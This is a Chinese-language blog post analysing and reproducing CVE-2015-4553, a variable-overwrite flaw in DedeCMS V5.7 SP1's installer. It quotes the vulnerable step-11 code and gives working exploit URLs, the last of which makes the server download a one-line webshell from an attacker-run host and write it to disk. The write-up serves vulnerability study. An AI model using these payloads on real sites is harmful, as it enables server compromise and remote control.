DedeCMS V5.7 SP1远程任意文件写入漏洞(CVE-2015-4553)


在这里插入图片描述

漏洞原因

uploads/install/index.php中对于全局传参遍历的处理不当造成可进行变量覆盖,进而导致可远程读任意文件取并写入Shell

漏洞影响版本

<= Dedecms V5.7 SP1的所有版本

漏洞原理分析&复现

  • 本文测试版本:DedeCMS V5.7

安装并没什么需要特别提及的地方,默认安装即可
在这里插入图片描述
审计源码

uploads/install/index.php
在这里插入图片描述
在这里插入图片描述
对于全局传参遍历中的可变变量的写法${$_k}导致变量覆盖,RunMagicQuotes()每个参数的值进行了特殊字符转义处理

PHP可变变量:https://www.php.net/manual/zh/language.variables.variable.php
在这里插入图片描述
继续分析
uploads/install/index.php
在这里插入图片描述
$step==11时,有一个包含文件的操作,但是包含的内容是已经写死的,无法进行远程文件包含
uploads/data/admin/config_update.php
在这里插入图片描述
但是仔细分析下代码就会发现,fopen($install_demo_name,'w')fwrite($fp,$sql_content)处理过程中的参数全都可控(利用变量覆盖可控制这些变量的值),那么就可以控制重写的文件以及内容,$install_demo_name为重写的文件名,file_get_contents($rmurl)读出来的内容为重写的文件内容。

else if($step==11)
{
	require_once('../data/admin/config_update.php');
	$rmurl = $updateHost."dedecms/demodata.{$s_lang}.txt";
	
	$sql_content = file_get_contents($rmurl);
	$fp = fopen($install_demo_name,'w');
	if(fwrite($fp,$sql_content))
		echo '&nbsp; <font color="green">[√]</font> 存在(您可以选择安装进行体验)';
	else
		echo '&nbsp; <font color="red">[×]</font> 远程获取失败';
	unset($sql_content);
	fclose($fp);
	exit();
}

即可首先变量覆盖控制$s_lang的值,传一个不存在的文件名,使得file_get_contents($rmurl)读出来的值为,然后继续变量覆盖控制$install_demo_name的值,指定为../data/admin/config_update.php,这样就可以将config_update.php原本的内容清空掉,使得包含的文件中没有$updateHost的值,进而可以通过变量覆盖控制$updateHost的值

为什么要清除掉config_update.php中的$updateHost的值之后才能变量覆盖?如下图,如果不清除掉包含进来的$updateHost的值,在变量覆盖的漏洞点之后包含进来的文件没法通过变量覆盖控制包含文件中的变量。
在这里插入图片描述
构造payload重写清空掉../data/admin/config_update.php的内容,注意安装成功后再访问uploads/install/index.php会检查是否存在install/install_lock.txt文件

在这里插入图片描述
在这里插入图片描述
利用变量覆盖直接覆盖掉$insLockfile的值,只要是一个不存的文件就行,或者直接置空。综上所述payload如下

/install/index.php?step=11&insLockfile=&s_lang=mochu7&install_demo_name=../data/admin/config_update.php

在这里插入图片描述
在这里插入图片描述
然后即可利用变量覆盖控制到$updateHost的值,进而控制file_get_contents($rmurl)获取到的内容,进行远程下载,然后写入(也可以叫上传)到服务器上。
在这里插入图片描述
远程起一个web服务,新建一个dedecms/demodata.mochu7.txt目录下的文件,内容为一句话木马。

PS:这里是dedecms/demodata.mochu7.txt那么构造payload时候也要控制$s_langmochu7才可
在这里插入图片描述
构造payload

/install/index.php?step=11&insLockfile=&s_lang=mochu7&install_demo_name=../mochu7.php&updateHost=http://192.168.0.100/

在这里插入图片描述
在这里插入图片描述
成功写入webshell

  • 2
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

末 初

谢谢老板!

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值